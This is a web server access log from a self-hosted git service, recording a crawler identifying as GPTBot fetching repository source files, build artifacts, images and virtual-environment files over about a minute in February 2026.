"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21736] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:17:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42451] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21631] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:17:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:17:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13847] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:17:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 14999] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15015] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20164] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20163] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20123] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 14979] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:17:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13846] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11086] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12855] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12856] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 27456] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:17:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 74.7.227.38] [Length 11549] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:17:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11549] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:17:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13021] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 888] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:05:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:05:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 